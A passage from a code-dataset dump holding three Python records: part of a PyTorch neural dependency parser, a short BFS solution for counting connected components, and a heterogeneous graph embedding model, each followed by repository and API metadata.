inst_length - 1]\n # (root has already been discarded as a modifier)\n head_scores = all_head_scores[i, :length, :length - 1]\n\n # get a tensor [inst_length, inst_length - 1, num_labels]\n label_scores = all_label_scores[i, :length, :length - 1]\n\n mask = mask[:, 1:]\n head_scores1d = head_scores[mask]\n label_scores1d = label_scores[mask].view(-1)\n\n if self.training:\n # apply the margin on the scores of gold parts\n gold_arc_parts = torch.tensor(\n inst_parts.gold_parts[:inst_parts.num_arcs],\n device=head_scores.device)\n\n offset = inst_parts.offsets[Target.RELATIONS]\n num_labeled = inst_parts.num_labeled_arcs\n gold_label_parts = torch.tensor(\n inst_parts.gold_parts[offset:offset + num_labeled],\n device=head_scores.device)\n head_scores1d = head_scores1d - gold_arc_parts\n label_scores1d = label_scores1d - gold_label_parts\n\n new_head_scores.append(head_scores1d)\n new_label_scores.append(label_scores1d)\n\n self.scores[Target.HEADS] = new_head_scores\n self.scores[Target.RELATIONS] = new_label_scores\n\n def forward(self, instances, parts, normalization=ParsingObjective.LOCAL):\n \"\"\"\n :param instances: a list of DependencyInstance objects\n :param parts: a list of DependencyParts objects\n :param normalization: a ParsingObjective value indicating \"local\",\n \"global-margin\" or \"global-prob\". It only affects\n first order parts (arcs and labeled arcs).\n\n If \"local\", the losses for each word (as a modifier) is computed\n independently. The model will store a tensor with all arc scores\n (including padding) for efficient loss computation.\n\n If \"global-margin\", the loss is a hinge margin over the global\n structure.\n\n If \"global-prob\", the loss is the cross-entropy of the probability\n of the global structure.\n\n In the two latter cases, the model stores scores as a list of 1d\n arrays (without padding) that can easily be used with AD3 decoding\n functions.\n\n :return: a dictionary mapping each target to score tensors\n \"\"\"\n self.scores = {}\n for type_ in parts[0].part_lists:\n self.scores[type_] = []\n\n batch_size = len(instances)\n lengths = torch.tensor([len(instance) for instance in instances],\n dtype=torch.long)\n if self.on_gpu:\n lengths = lengths.cuda()\n\n # packed sequences must be sorted by decreasing length\n sorted_lengths, inds = lengths.sort(descending=True)\n\n # rev_inds are used to unsort the sorted sentences back\n _, rev_inds = inds.sort()\n if self.on_gpu:\n sorted_lengths = sorted_lengths.cuda()\n\n max_length = sorted_lengths[0].item()\n\n # compute char inds only once\n if self.char_rnn or self.predict_lemma:\n char_indices, token_lengths = create_char_indices(\n instances, max_length)\n char_indices = char_indices.to(lengths.device)\n token_lengths = token_lengths.to(lengths.device)\n else:\n char_indices, token_lengths = None, None\n\n embeddings = self.get_word_representations(\n instances, max_length, char_indices, token_lengths)\n\n if self.shared_rnn is not None:\n packed_embeddings = rnn_utils.pack_padded_sequence(\n embeddings, lengths, batch_first=True, enforce_sorted=False)\n\n # get hidden states for all words, ignore final cell\n packed_states, _ = self.shared_rnn(packed_embeddings)\n\n # ignore lengths -- we already know them!\n hidden_states, _ = rnn_utils.pad_packed_sequence(\n packed_states, batch_first=True)\n else:\n hidden_states = embeddings\n\n if self.predict_tags or self.predict_lemma:\n if self.tagger_rnn is None:\n # ignore root\n tagger_states = hidden_states[:, 1:]\n else:\n dropped = self.dropout(hidden_states)\n packed_states = rnn_utils.pack_padded_sequence(\n dropped, lengths, batch_first=True, enforce_sorted=False)\n tagger_packed_states, _ = self.tagger_rnn(packed_states)\n tagger_states, _ = rnn_utils.pad_packed_sequence(\n tagger_packed_states, batch_first=True)\n tagger_states = tagger_states[:, 1:]\n\n if self.predict_upos:\n if self.tag_mlp_size > 0:\n scorer_states = self.upos_mlp(tagger_states)\n else:\n scorer_states = tagger_states\n self.scores[Target.UPOS] = self.upos_scorer(scorer_states)\n\n if self.predict_xpos:\n if self.tag_mlp_size > 0:\n scorer_states = self.xpos_mlp(tagger_states)\n else:\n scorer_states = tagger_states\n self.scores[Target.XPOS] = self.xpos_scorer(scorer_states)\n\n if self.predict_morph:\n if self.tag_mlp_size > 0:\n scorer_states = self.morph_mlp(tagger_states)\n else:\n scorer_states = tagger_states\n self.scores[Target.MORPH] = self.morph_scorer(scorer_states)\n\n if self.predict_lemma:\n if self.training:\n lemmas, lemma_lengths = get_padded_lemma_indices(\n instances, max_length)\n lemmas = lemmas.to(lengths.device)\n lemma_lengths = lemma_lengths.to(lengths.device)\n else:\n lemmas, lemma_lengths = None, None\n\n # skip root\n logits = self.lemmatizer(\n char_indices[:, 1:], tagger_states,\n token_lengths[:, 1:], lemmas, lemma_lengths)\n self.scores[Target.LEMMA] = logits\n\n if self.predict_tree:\n if self.parser_rnn is None:\n parser_states = hidden_states\n else:\n dropped = self.dropout(hidden_states)\n packed_states = rnn_utils.pack_padded_sequence(\n dropped, lengths, batch_first=True, enforce_sorted=False)\n\n parser_packed_states, _ = self.parser_rnn(packed_states)\n parser_states, _ = rnn_utils.pad_packed_sequence(\n parser_packed_states, batch_first=True)\n\n self._compute_arc_scores(\n parser_states, lengths, normalization)\n\n # now go through each batch item\n for i in range(batch_size):\n length = lengths[i].item()\n states = parser_states[i, :length]\n sent_parts = parts[i]\n\n if self.model_type.consecutive_siblings:\n self._compute_consecutive_sibling_scores(states, sent_parts)\n\n if self.model_type.grandparents:\n self._compute_grandparent_scores(states, sent_parts)\n\n if self.model_type.grandsiblings:\n self._compute_grandsibling_scores(states, sent_parts)\n\n if normalization == ParsingObjective.GLOBAL_MARGIN:\n self._convert_arc_scores_to_parts(instances, parts)\n\n return self.scores\n", "repo_name": "deep-spin/pyturbo", "sub_path": "turboparser/parser/dependency_neural_model.py", "file_name": "dependency_neural_model.py", "file_ext": "py", "file_size_in_byte": 58292, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.distributions.gumbel.Gumbel", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 65, "usage_type": "attribute"}, {"api_name": "torch.nn.utils.rnn.pad_sequence", "line_number": 68, "usage_type": "call"}, {"api_name": "torch.nn.utils.rnn", "line_number": 68, "usage_type": "name"}, {"api_name": "torch.nn.utils.rnn.pad_sequence", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.nn.utils.rnn", "line_number": 75, "usage_type": "name"}, {"api_name": "torch.nn.utils.rnn.pad_sequence", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.nn.utils.rnn", "line_number": 77, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 101, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 104, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 104, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 107, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 112, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 282, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 282, "usage_type": "name"}, {"api_name": "torch.cuda.is_available", "line_number": 330, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 330, "usage_type": "attribute"}, {"api_name": "token_dictionary.get_embedding_id", "line_number": 341, "usage_type": "call"}, {"api_name": "token_dictionary.UNKNOWN", "line_number": 341, "usage_type": "argument"}, {"api_name": "token_dictionary.get_form_id", "line_number": 342, "usage_type": "call"}, {"api_name": "token_dictionary.UNKNOWN", "line_number": 342, "usage_type": "argument"}, {"api_name": "token_dictionary.get_upos_id", "line_number": 343, "usage_type": "call"}, {"api_name": "token_dictionary.UNKNOWN", "line_number": 343, "usage_type": "argument"}, {"api_name": "token_dictionary.get_xpos_id", "line_number": 344, "usage_type": "call"}, {"api_name": "token_dictionary.UNKNOWN", "line_number": 344, "usage_type": "argument"}, {"api_name": "token_dictionary.get_lemma_id", "line_number": 345, "usage_type": "call"}, {"api_name": "token_dictionary.UNKNOWN", "line_number": 345, "usage_type": "argument"}, {"api_name": "token_dictionary.morph_tag_alphabets", "line_number": 346, "usage_type": "attribute"}, {"api_name": "token_dictionary.UNKNOWN", "line_number": 350, "usage_type": "argument"}, {"api_name": "token_dictionary.get_num_forms", "line_number": 355, "usage_type": "call"}, {"api_name": "torch.nn.Embedding", "line_number": 356, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 356, "usage_type": "name"}, {"api_name": "token_dictionary.get_num_lemmas", "line_number": 363, "usage_type": "call"}, {"api_name": "torch.nn.Embedding", "line_number": 364, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 364, "usage_type": "name"}, {"api_name": "token_dictionary.get_num_upos_tags", "line_number": 373, "usage_type": "call"}, {"api_name": "constants.SPECIAL_SYMBOLS", "line_number": 374, "usage_type": "argument"}, {"api_name": "torch.nn.Embedding", "line_number": 375, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 375, "usage_type": "name"}, {"api_name": "token_dictionary.get_num_xpos_tags", "line_number": 381, "usage_type": "call"}, {"api_name": "token_dictionary.get_xpos_tags", "line_number": 382, "usage_type": "call"}, {"api_name": "token_dictionary.get_upos_tags", "line_number": 383, "usage_type": "call"}, {"api_name": "constants.SPECIAL_SYMBOLS", "line_number": 384, "usage_type": "argument"}, {"api_name": "torch.nn.Embedding", "line_number": 386, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 386, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 395, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 395, "usage_type": "name"}, {"api_name": "torch.nn.Embedding", "line_number": 398, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 398, "usage_type": "name"}, {"api_name": "token_dictionary.get_num_characters", "line_number": 406, "usage_type": "call"}, {"api_name": "layers.lstm.CharLSTM", "line_number": 408, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 413, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 413, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 424, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 425, "usage_type": "attribute"}, {"api_name": "torch.nn.Embedding.from_pretrained", "line_number": 426, "usage_type": "call"}, {"api_name": "torch.nn.Embedding", "line_number": 426, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 426, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 429, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 429, "usage_type": "name"}, {"api_name": "transformers.BertConfig", "line_number": 437, "usage_type": "argument"}, {"api_name": "transformers.BertModel", "line_number": 438, "usage_type": "call"}, {"api_name": "transformers.BertModel.from_pretrained", "line_number": 441, "usage_type": "call"}, {"api_name": "transformers.BertModel", "line_number": 441, "usage_type": "name"}, {"api_name": "torch.nn.Parameter", "line_number": 445, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 445, "usage_type": "name"}, {"api_name": "torch.randn", "line_number": 446, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 446, "usage_type": "call"}, {"api_name": "torch.nn.Dropout", "line_number": 447, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 447, "usage_type": "name"}, {"api_name": "layers.lstm.HighwayLSTM", "line_number": 451, "usage_type": "call"}, {"api_name": "layers.lstm.LSTM", "line_number": 462, "usage_type": "call"}, {"api_name": "torch.nn.ReLU", "line_number": 475, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 475, "usage_type": "name"}, {"api_name": "token_dictionary.get_num_upos_tags", "line_number": 476, "usage_type": "call"}, {"api_name": "torch.nn.ReLU", "line_number": 483, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 483, "usage_type": "name"}, {"api_name": "token_dictionary.get_num_xpos_tags", "line_number": 484, "usage_type": "call"}, {"api_name": "torch.nn.ReLU", "line_number": 491, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 491, "usage_type": "name"}, {"api_name": "token_dictionary.get_num_morph_singletons", "line_number": 492, "usage_type": "call"}, {"api_name": "layers.lstm.LSTM", "line_number": 502, "usage_type": "call"}, {"api_name": "token_dictionary.get_num_deprels", "line_number": 510, "usage_type": "call"}, {"api_name": "layers.biaffine.DeepBiaffineScorer", "line_number": 511, "usage_type": "call"}, {"api_name": "layers.biaffine.DeepBiaffineScorer", "line_number": 513, "usage_type": "call"}, {"api_name": "layers.biaffine.DeepBiaffineScorer", "line_number": 516, "usage_type": "call"}, {"api_name": "layers.biaffine.DeepBiaffineScorer", "line_number": 518, "usage_type": "call"}, {"api_name": "torch.randn", "line_number": 572, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 572, "usage_type": "call"}, {"api_name": "torch.full", "line_number": 574, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 578, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 578, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 593, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 593, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 594, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 594, "usage_type": "name"}, {"api_name": "layers.lstm", "line_number": 622, "usage_type": "name"}, {"api_name": "layers.lstm.append", "line_number": 625, "usage_type": "call"}, {"api_name": "layers.lstm", "line_number": 625, "usage_type": "name"}, {"api_name": "torch.relu", "line_number": 625, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 627, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 627, "usage_type": "name"}, {"api_name": "layers.lstm.extend", "line_number": 628, "usage_type": "call"}, {"api_name": "layers.lstm", "line_number": 628, "usage_type": "name"}, {"api_name": "layers.lstm.append", "line_number": 632, "usage_type": "call"}, {"api_name": "layers.lstm", "line_number": 632, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 634, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 634, "usage_type": "name"}, {"api_name": "layers.lstm", "line_number": 634, "usage_type": "name"}, {"api_name": "torch.save", "line_number": 638, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 686, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 687, "usage_type": "attribute"}, {"api_name": "transformers.BertConfig.from_dict", "line_number": 694, "usage_type": "call"}, {"api_name": "transformers.BertConfig", "line_number": 694, "usage_type": "name"}, {"api_name": "torch.load", "line_number": 717, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 719, "usage_type": "call"}, {"api_name": "constants.ParsingObjective.LOCAL", "line_number": 753, "usage_type": "attribute"}, {"api_name": "constants.ParsingObjective", "line_number": 753, "usage_type": "name"}, {"api_name": "torch.eye", "line_number": 756, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 758, "usage_type": "attribute"}, {"api_name": "numpy.inf", "line_number": 766, "usage_type": "attribute"}, {"api_name": "constants.ParsingObjective.GLOBAL_MARGIN", "line_number": 768, "usage_type": "attribute"}, {"api_name": "constants.ParsingObjective", "line_number": 768, "usage_type": "name"}, {"api_name": "torch.arange", "line_number": 774, "usage_type": "call"}, {"api_name": "torch.nn.functional.logsigmoid", "line_number": 780, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 780, "usage_type": "name"}, {"api_name": "torch.sign", "line_number": 781, "usage_type": "call"}, {"api_name": "torch.nn.functional.softplus", "line_number": 787, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 787, "usage_type": "name"}, {"api_name": "torch.abs", "line_number": 788, "usage_type": "call"}, {"api_name": "torch.log", "line_number": 791, "usage_type": "call"}, {"api_name": "constants.Target.HEADS", "line_number": 800, "usage_type": "attribute"}, {"api_name": "constants.Target", "line_number": 800, "usage_type": "name"}, {"api_name": "constants.Target.RELATIONS", "line_number": 801, "usage_type": "attribute"}, {"api_name": "constants.Target", "line_number": 801, "usage_type": "name"}, {"api_name": "constants.Target.SIGN", "line_number": 802, "usage_type": "attribute"}, {"api_name": "constants.Target", "line_number": 802, "usage_type": "name"}, {"api_name": "constants.Target.DISTANCE", "line_number": 803, "usage_type": "attribute"}, {"api_name": "constants.Target", "line_number": 803, "usage_type": "name"}, {"api_name": "constants.Target.GRANDPARENTS", "line_number": 815, "usage_type": "attribute"}, {"api_name": "constants.Target", "line_number": 815, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 816, "usage_type": "call"}, {"api_name": "constants.Target.GRANDPARENTS", "line_number": 817, "usage_type": "attribute"}, {"api_name": "constants.Target", "line_number": 817, "usage_type": "name"}, {"api_name": "constants.Target.GRANDPARENTS", "line_number": 828, "usage_type": "attribute"}, {"api_name": "constants.Target", "line_number": 828, "usage_type": "name"}, {"api_name": "torch.tanh", "line_number": 840, "usage_type": "call"}, {"api_name": "torch.tanh", "line_number": 841, "usage_type": "call"}, {"api_name": "torch.tanh", "line_number": 842, "usage_type": "call"}, {"api_name": "constants.Target.GRANDPARENTS", "line_number": 846, "usage_type": "attribute"}, {"api_name": "constants.Target", "line_number": 846, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 859, "usage_type": "call"}, {"api_name": "constants.Target.NEXT_SIBLINGS", "line_number": 870, "usage_type": "attribute"}, {"api_name": "constants.Target", "line_number": 870, "usage_type": "name"}, {"api_name": "torch.tanh", "line_number": 888, "usage_type": "call"}, {"api_name": "torch.tanh", "line_number": 889, "usage_type": "call"}, {"api_name": "torch.tanh", "line_number": 890, "usage_type": "call"}, {"api_name": "constants.Target.NEXT_SIBLINGS", "line_number": 895, "usage_type": "attribute"}, {"api_name": "constants.Target", "line_number": 895, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 908, "usage_type": "call"}, {"api_name": "constants.Target.GRANDSIBLINGS", "line_number": 921, "usage_type": "attribute"}, {"api_name": "constants.Target", "line_number": 921, "usage_type": "name"}, {"api_name": "torch.tanh", "line_number": 939, "usage_type": "call"}, {"api_name": "torch.tanh", "line_number": 940, "usage_type": "call"}, {"api_name": "torch.tanh", "line_number": 941, "usage_type": "call"}, {"api_name": "constants.Target.GRANDSIBLINGS", "line_number": 946, "usage_type": "attribute"}, {"api_name": "constants.Target", "line_number": 946, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 956, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 957, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 961, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 961, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 967, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 968, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 971, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 976, "usage_type": "call"}, {"api_name": "torch.ones_like", "line_number": 979, "usage_type": "call"}, {"api_name": "torch.split", "line_number": 990, "usage_type": "call"}, {"api_name": "torch.split", "line_number": 991, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 996, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 997, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 1002, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 1015, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 1021, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 1025, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 1086, "usage_type": "call"}, {"api_name": "torch.rand_like", "line_number": 1091, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 1115, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 1116, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 1121, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 1134, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 1134, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 1149, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 1182, "usage_type": "call"}, {"api_name": "constants.Target.HEADS", "line_number": 1182, "usage_type": "attribute"}, {"api_name": "constants.Target", "line_number": 1182, "usage_type": "name"}, {"api_name": "torch.transpose", "line_number": 1183, "usage_type": "call"}, {"api_name": "constants.Target.RELATIONS", "line_number": 1183, "usage_type": "attribute"}, {"api_name": "constants.Target", "line_number": 1183, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 1188, "usage_type": "call"}, {"api_name": "numpy.bool", "line_number": 1188, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 1204, "usage_type": "call"}, {"api_name": "constants.Target.RELATIONS", "line_number": 1208, "usage_type": "attribute"}, {"api_name": "constants.Target", "line_number": 1208, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 1210, "usage_type": "call"}, {"api_name": "constants.Target.HEADS", "line_number": 1219, "usage_type": "attribute"}, {"api_name": "constants.Target", "line_number": 1219, "usage_type": "name"}, {"api_name": "constants.Target.RELATIONS", "line_number": 1220, "usage_type": "attribute"}, {"api_name": "constants.Target", "line_number": 1220, "usage_type": "name"}, {"api_name": "constants.ParsingObjective.LOCAL", "line_number": 1222, "usage_type": "attribute"}, {"api_name": "constants.ParsingObjective", "line_number": 1222, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 1251, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 1252, "usage_type": "attribute"}, {"api_name": "torch.nn.utils.rnn.pack_padded_sequence", "line_number": 1279, "usage_type": "call"}, {"api_name": "torch.nn.utils.rnn", "line_number": 1279, "usage_type": "name"}, {"api_name": "torch.nn.utils.rnn.pad_packed_sequence", "line_number": 1286, "usage_type": "call"}, {"api_name": "torch.nn.utils.rnn", "line_number": 1286, "usage_type": "name"}, {"api_name": "torch.nn.utils.rnn.pack_padded_sequence", "line_number": 1297, "usage_type": "call"}, {"api_name": "torch.nn.utils.rnn", "line_number": 1297, "usage_type": "name"}, {"api_name": "torch.nn.utils.rnn.pad_packed_sequence", "line_number": 1300, "usage_type": "call"}, {"api_name": "torch.nn.utils.rnn", "line_number": 1300, "usage_type": "name"}, {"api_name": "constants.Target.UPOS", "line_number": 1309, "usage_type": "attribute"}, {"api_name": "constants.Target", "line_number": 1309, "usage_type": "name"}, {"api_name": "constants.Target.XPOS", "line_number": 1316, "usage_type": "attribute"}, {"api_name": "constants.Target", "line_number": 1316, "usage_type": "name"}, {"api_name": "constants.Target.MORPH", "line_number": 1323, "usage_type": "attribute"}, {"api_name": "constants.Target", "line_number": 1323, "usage_type": "name"}, {"api_name": "constants.Target.LEMMA", "line_number": 1338, "usage_type": "attribute"}, {"api_name": "constants.Target", "line_number": 1338, "usage_type": "name"}, {"api_name": "torch.nn.utils.rnn.pack_padded_sequence", "line_number": 1345, "usage_type": "call"}, {"api_name": "torch.nn.utils.rnn", "line_number": 1345, "usage_type": "name"}, {"api_name": "torch.nn.utils.rnn.pad_packed_sequence", "line_number": 1349, "usage_type": "call"}, {"api_name": "torch.nn.utils.rnn", "line_number": 1349, "usage_type": "name"}, {"api_name": "constants.ParsingObjective.GLOBAL_MARGIN", "line_number": 1370, "usage_type": "attribute"}, {"api_name": "constants.ParsingObjective", "line_number": 1370, "usage_type": "name"}]} +{"seq_id": "71888576489", "text": "# 백준 11724 연결 요소의 개수\n\nfrom collections import defaultdict, deque\n\nn,m = map(int,input().split())\nv = [0]*(n+1)\ntree = defaultdict(list)\n\nfor _ in range(m):\n s,e = map(int,input().split())\n tree[s].append(e)\n tree[e].append(s)\n\nanswer = 0\nfor i in range(1,n+1):\n if not v[i]:\n q = deque()\n q.append(i)\n v[i] = 1\n answer += 1\n while q:\n idx = q.popleft()\n for next_idx in tree[idx]:\n if not v[next_idx]:\n v[next_idx] = 1\n q.append(next_idx)\n\nprint(answer)", "repo_name": "do0134/solostudy", "sub_path": "algorithm/9월/0902/1sol.py", "file_name": "1sol.py", "file_ext": "py", "file_size_in_byte": 594, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.defaultdict", "line_number": 7, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "34835985482", "text": "import torch\r\nfrom torch_geometric.nn import GCNConv\r\nfrom torch_geometric.nn import ChebConv\r\nfrom torch_geometric.nn import SAGEConv\r\nfrom torch_geometric.nn import Linear\r\nfrom layers import Discriminator\r\nfrom layers import AvgReadout\r\nfrom layers import SemanticAttentionLayer\r\nimport torch.nn.functional as F\r\nimport numpy as np\r\n\r\n\r\nclass LHGI(torch.nn.Module):\r\n def __init__(self,input_dim,att_dim,dropout_rate=0.):\r\n super(LHGI, self).__init__()\r\n #super parameters:\r\n self.dropout_rate = dropout_rate\r\n self.linear=Linear(-1,input_dim)\r\n\r\n self.semantic_level_attention=SemanticAttentionLayer(input_dim, att_dim)\r\n self.readout = AvgReadout()\r\n self.disc = Discriminator(input_dim)\r\n self.sig = torch.sigmoid\r\n\r\n self.conv_1 = GCNConv(input_dim, input_dim)\r\n self.conv_2 = GCNConv(input_dim, input_dim)\r\n\r\n\r\n def forward(self,graph,summary_vetor,nodeType,Batch_size):\r\n\r\n x_dict=graph.x_dict\r\n edge_index_dict=graph.edge_index_dict\r\n\r\n X_origin=x_dict[nodeType]\r\n\r\n idx = np.random.permutation(graph[nodeType].num_nodes)\r\n X_origin_shuffle = X_origin[idx, :]\r\n\r\n\r\n X_origin=self.linear(X_origin) #输入是one-hot时可以参考使用torch.nn.embedding(),减少模型输入规模\r\n X_origin=F.relu(X_origin)\r\n X_origin_shuffle=self.linear(X_origin_shuffle)\r\n X_origin_shuffle=F.relu(X_origin_shuffle)\r\n\r\n\r\n\r\n\r\n\r\n\r\n GNN_conv_list_1=[]\r\n GNN_conv_list_2=[]\r\n for edge in edge_index_dict.values():\r\n X = self.conv_1(X_origin, edge)\r\n X = F.relu(X)\r\n X = F.dropout(X, p=self.dropout_rate, training=self.training)\r\n\r\n X = self.conv_2(X, edge)\r\n X = F.relu(X)\r\n X = F.dropout(X, p=self.dropout_rate, training=self.training)\r\n\r\n\r\n X_shuffle = self.conv_1(X_origin_shuffle, edge)\r\n X_shuffle = F.relu(X_shuffle)\r\n X_shuffle = F.dropout(X_shuffle, p=self.dropout_rate, training=self.training)\r\n\r\n X_shuffle = self.conv_2(X_shuffle, edge)\r\n X_shuffle = F.relu(X_shuffle)\r\n X_shuffle = F.dropout(X_shuffle, p=self.dropout_rate, training=self.training)\r\n\r\n\r\n ###########\r\n GNN_conv_list_1.append(X)\r\n GNN_conv_list_2.append(X_shuffle)\r\n\r\n\r\n\r\n\r\n muilt_gcn_out=torch.cat(GNN_conv_list_1,dim=0)\r\n muilt_gcn_out_nagtive = torch.cat(GNN_conv_list_2,dim=0)\r\n\r\n\r\n Att_out = self.semantic_level_attention(muilt_gcn_out , len(edge_index_dict))\r\n Att_out_nagtive = self.semantic_level_attention(muilt_gcn_out_nagtive, len(edge_index_dict))\r\n\r\n\r\n Att_out=Att_out[:Batch_size]\r\n Att_out_nagtive=Att_out_nagtive[:Batch_size]\r\n\r\n summary_vetor_in_model = self.readout(Att_out, None)\r\n\r\n summary_vetor = torch.stack((summary_vetor, summary_vetor_in_model), dim=0)\r\n summary_vetor = torch.mean(summary_vetor,dim=0)\r\n #summary_vetor = self.sig(summary_vetor)\r\n\r\n samp_bias1 = None\r\n samp_bias2 = None\r\n\r\n ret = self.disc(summary_vetor, Att_out, Att_out_nagtive, samp_bias1, samp_bias2)\r\n return ret, summary_vetor\r\n\r\n\r\n def get_embedding(self,graph,nodeType,target_id_set=None):\r\n\r\n x_dict = graph.x_dict\r\n edge_index_dict = graph.edge_index_dict\r\n\r\n X_origin = x_dict[nodeType]\r\n\r\n\r\n X_origin = self.linear(X_origin)\r\n X_origin = F.relu(X_origin)\r\n\r\n\r\n GNN_conv_list_1 = []\r\n for edge in edge_index_dict.values():\r\n X = self.conv_1(X_origin, edge)\r\n X = F.relu(X)\r\n X = F.dropout(X, p=self.dropout_rate, training=self.training)\r\n\r\n X = self.conv_2(X, edge)\r\n X = F.relu(X)\r\n X = F.dropout(X, p=self.dropout_rate, training=self.training)\r\n\r\n\r\n GNN_conv_list_1.append(X)\r\n\r\n\r\n muilt_gcn_out = torch.cat(GNN_conv_list_1, dim=0)\r\n Att_out = self.semantic_level_attention(muilt_gcn_out, len(edge_index_dict))\r\n\r\n embedding=Att_out\r\n embedding =embedding.detach().cpu()\r\n\r\n if target_id_set == None:\r\n return embedding\r\n else:\r\n return embedding[target_id_set,:]\r\n\r\n\r\n\r\n\r\n\r\n\r\n", "repo_name": "Zhonny/LHGI", "sub_path": "LHGI.py", "file_name": "LHGI.py", "file_ext": "py", "file_size_in_byte": 4271, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.nn", "line_number": 13, "usage_type": "attribute"}, {"api_name": "torch_geometric.nn.Linear", "line_number": 18, "usage_type": "call"}, {"api_name": "layers.SemanticAttentionLayer", "line_number": 20, "usage_type": "call"}, {"api_name": "layers.AvgReadout", "line_number": 21, "usage_type": "call"}, {"api_name": "layers.Discriminator", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.sigmoid", "line_number": 23, "usage_type": "attribute"}, {"api_name": "torch_geometric.nn.GCNConv", "line_number": 25, "usage_type": "call"}, {"api_name": "torch_geometric.nn.GCNConv", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.random.permutation", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 36, "usage_type": "attribute"}, {"api_name": "torch.nn.functional.relu", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 41, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 43, "usage_type": "name"}, {"api_name": 